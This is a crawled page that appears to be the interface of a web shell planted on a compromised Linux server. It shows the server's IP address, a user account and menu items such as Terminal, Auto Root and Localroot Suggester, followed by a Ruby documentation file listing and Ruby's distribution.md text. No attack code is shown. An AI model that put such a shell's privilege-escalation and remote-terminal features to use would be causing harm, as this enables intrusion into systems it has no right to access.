Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.188
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
doc /
alt-ruby33-doc /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
irb
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
pty
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
syntax
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
ChangeLog
18.15
KB
-rw-r--r--
2026-03-26 03:35
README.md
3.64
KB
-rw-r--r--
2026-03-26 03:35
_regexp.rdoc
43.58
KB
-rw-r--r--
2026-03-26 03:35
_timezones.rdoc
5.54
KB
-rw-r--r--
2026-03-26 03:35
bsearch.rdoc
4.24
KB
-rw-r--r--
2026-03-26 03:35
bug_triaging.rdoc
4.04
KB
-rw-r--r--
2026-03-26 03:35
case_mapping.rdoc
3.15
KB
-rw-r--r--
2026-03-26 03:35
character_selectors.rdoc
3.38
KB
-rw-r--r--
2026-03-26 03:35
command_injection.rdoc
745
B
-rw-r--r--
2026-03-26 03:35
contributing.md
990
B
-rw-r--r--
2026-03-26 03:35
dig_methods.rdoc
2.57
KB
-rw-r--r--
2026-03-26 03:35
distribution.md
2.03
KB
-rw-r--r--
2026-03-26 03:35
dtrace_probes.rdoc
7.42
KB
-rw-r--r--
2026-03-26 03:35
encodings.rdoc
16.27
KB
-rw-r--r--
2026-03-26 03:35
extension.ja.rdoc
73.03
KB
-rw-r--r--
2026-03-26 03:35
extension.rdoc
74.62
KB
-rw-r--r--
2026-03-26 03:35
fiber.md
6.74
KB
-rw-r--r--
2026-03-26 03:35
format_specifications.rdoc
9.87
KB
-rw-r--r--
2026-03-26 03:35
forwardable.rd.ja
2.34
KB
-rw-r--r--
2026-03-26 03:35
globals.rdoc
8.46
KB
-rw-r--r--
2026-03-26 03:35
implicit_conversion.rdoc
5.8
KB
-rw-r--r--
2026-03-26 03:35
keywords.rdoc
4.63
KB
-rw-r--r--
2026-03-26 03:35
maintainers.md
11.22
KB
-rw-r--r--
2026-03-26 03:35
marshal.rdoc
11.51
KB
-rw-r--r--
2026-03-26 03:35
memory_view.md
6.51
KB
-rw-r--r--
2026-03-26 03:35
packed_data.rdoc
18.76
KB
-rw-r--r--
2026-03-26 03:35
ractor.md
26.16
KB
-rw-r--r--
2026-03-26 03:35
ruby-exercise.stp
1.08
KB
-rw-r--r--
2026-04-07 17:01
security.rdoc
5.72
KB
-rw-r--r--
2026-03-26 03:35
signals.rdoc
3.33
KB
-rw-r--r--
2026-03-26 03:35
standard_library.rdoc
6.58
KB
-rw-r--r--
2026-03-26 03:35
strftime_formatting.rdoc
16.36
KB
-rw-r--r--
2026-03-26 03:35
syntax.rdoc
1.29
KB
-rw-r--r--
2026-03-26 03:35
windows.md
5.91
KB
-rw-r--r--
2026-03-26 03:35
yarvarch.en
106
B
-rw-r--r--
2026-03-26 03:35
yarvarch.ja
16.41
KB
-rw-r--r--
2026-03-26 03:35
Save
Rename
# Distribution This document outlines the expected way to distribute Ruby, with a specific focus on building Ruby packages. ## Getting the Ruby Tarball ### Official Releases The tarball for official releases is created by the release manager. The release manager uploads the tarball to the [Ruby website](https://www.ruby-lang.org/en/downloads/). Downstream distributors should use the official release tarballs as part of their build process. This ensures that the tarball is created in a consistent way, and that the tarball is crytographically verified. ### Using the nightly tarball for testing See the Snapshots section of the [Ruby website](https://www.ruby-lang.org/en/downloads/). ### Building a manual snapshot tarball for testing This can be useful if the nightly tarball does not have all changes yet. At Ruby source tree cloned using git: ```sh-session $ ./autogen.sh $ ./configure -C $ make $ make dist ``` This will create several tarball in the `tmp` directory. The tarball will be named e.g. `ruby-<version>.tar.gz` (several different compression formats will be generated). ## Building the Tarball See [Building Ruby](contributing/building_ruby.md). ## Updating the Ruby Standard Library The Ruby standard library is a collection of Ruby files that are included with Ruby. These files are used to provide the basic functionality of Ruby. The standard library is located in the `lib` directory and is distributed as part of the Ruby tarball. Occasionally, the standard library needs to be updated, for example a security issue might be found in a default gem or standard gem. There are two main ways that Ruby would update this code. ### Releasing an Updated Ruby Gem Normally, the Ruby gem maintainer will release an updated gem. This gem can be installed alongside the default gem. This allows the user to update the gem without having to update Ruby. ### Releasing a New Ruby Version If the update is critical, then the Ruby maintainers may decide to release a new version of Ruby. This new version will include the updated standard library.